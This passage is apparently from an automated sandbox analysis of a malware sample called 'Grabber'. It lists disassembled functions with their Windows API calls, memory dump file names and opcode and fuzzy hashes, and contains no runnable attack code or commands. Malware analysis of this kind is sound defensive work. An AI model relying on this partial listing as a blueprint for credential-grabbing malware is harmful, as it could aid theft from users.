                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeapmemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 1807340688-513306843
                                                                                                                                                                                                                          • Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                                                                                                                                                                                                          • Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A
                                                                                                                                                                                                                          Function 00409DE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                                                                                                                                                                                                            • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                                                                                                                                                                                                            • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                                                                                                                                                                                                            • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$Alloc
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 3901518246-513306843
                                                                                                                                                                                                                          • Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                                                                                                                                                                                                          • Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8
                                                                                                                                                                                                                          Function 00405492 Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02199F70), ref: 004054AB
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                                                                                                                                                                                                            • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3708593966-0
                                                                                                                                                                                                                          • Opcode ID: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                                                                                                                                                                                                          • Instruction ID: 0c8983fff82f944e714e95dc609c427016460782395ad7ea9b381996daa8850a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E110632145604BFC3015F54EC05ED7BBB9EF45752721846BF800972A0EB75A8508F6D
                                                                                                                                                                                                                          Function 0040D946 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                                                                                                                                                                                                            • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3171405041-0
                                                                                                                                                                                                                          • Opcode ID: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                                                                                                                                                                                                                          • Instruction ID: 8e0b58a532cd0764c064264ab0afec864f9344a56e81b99afb7742a3bcd9c4dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80112B71501601AFC7209F55DC48B96BBB5FF49311F10843EA45A936A1D738A844CF98
                                                                                                                                                                                                                          Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                            • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02190000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004096C2
                                                                                                                                                                                                                          • memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocFileHeapModuleNameValuememmovewcscmp
                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                          • API String ID: 3734239354-4282027825
                                                                                                                                                                                                                          • Opcode ID: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                                                                                                                                                                                                                          • Instruction ID: 273bc576c06434c2caee33e7ea90b93358419674725e30c46c8a7bea9ec705d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0E2B31006017BC210677BDC85CAB7EACEB853747000A3FF515D24D2EA38D82496B8
                                                                                                                                                                                                                          Function 0040B236 Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B2D7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B2E0
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B2E9
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B2F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B302
                                                                                                                                                                                                                            • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C690
                                                                                                                                                                                                                            • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C6DF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                                          • Opcode ID: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                                                                                                                                                                                                                          • Instruction ID: 0935afcf37e6329c3ac2d0f56793f6a9f9fc9668031c2f15978d8007e640a3dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 322103317506083BE524AA29DC86F9F738CDB81708F40063EF241BA2C1CA79E54947AE
                                                                                                                                                                                                                          Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeapwcsncpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2304708654-0
                                                                                                                                                                                                                          • Opcode ID: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                                                                                                                                                                                                                          • Instruction ID: a3f43ae3cc8438659badc3904afd778ac5f48c872593279c616423bb3bd2bb8e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D51AD34508B059BDB209F28D844A6B77F4FF84348F544A2EF885A72D0E778E915CB99
                                                                                                                                                                                                                          Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
                                                                                                                                                                                                                          • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
                                                                                                                                                                                                                          • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
                                                                                                                                                                                                                          • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharLower
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1615517891-0
                                                                                                                                                                                                                          • Opcode ID: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                                                                                                                                                                                                          • Instruction ID: 50cff0fc212774e4e1f85142edc8b720228546f3e888a8e5f893537154114361
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 582176796043058BC710AF1D9C40077B7E4EB80364F86483BEC85A3380D639EE169BA9
                                                                                                                                                                                                                          Function 00412240 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00412281
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004122B0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2735977093-0
                                                                                                                                                                                                                          • Opcode ID: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                                                                                                                                                                                                          • Instruction ID: 3c1085fe75aa08d7dfcf325d5fd6ce3d1ff6e0efa089dc1519f7c1eb2db8e9d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F70145373413013BE2204685AC02FAB3B58CBC1B95F1900BAFF04AE6C0C6F3A80182B8
                                                                                                                                                                                                                          Function 004121A0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004121E4
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00412216
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2735977093-0
                                                                                                                                                                                                                          • Opcode ID: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                                                                                                                                                                                                          • Instruction ID: ba92e613a2f9bf0a88025da3432e472bc54701246ba04d0c993b0b67be8a7a27
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9401F57B38130137E3205695AC42FBB7B59CB81B95F1900BAFB05AE2C1D6F76814C6B9
                                                                                                                                                                                                                          Function 0040A96C Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SHGetFolderLocation.SHELL32(00000000,02199F70,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A99A
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4012708801-0
                                                                                                                                                                                                                          • Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                                                                                                                                                                                                          • Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5
                                                                                                                                                                                                                          Function 00405436 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
                                                                                                                                                                                                                            • Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428
                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472
                                                                                                                                                                                                                            • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                                                                                                                                                                                                          • String ID:
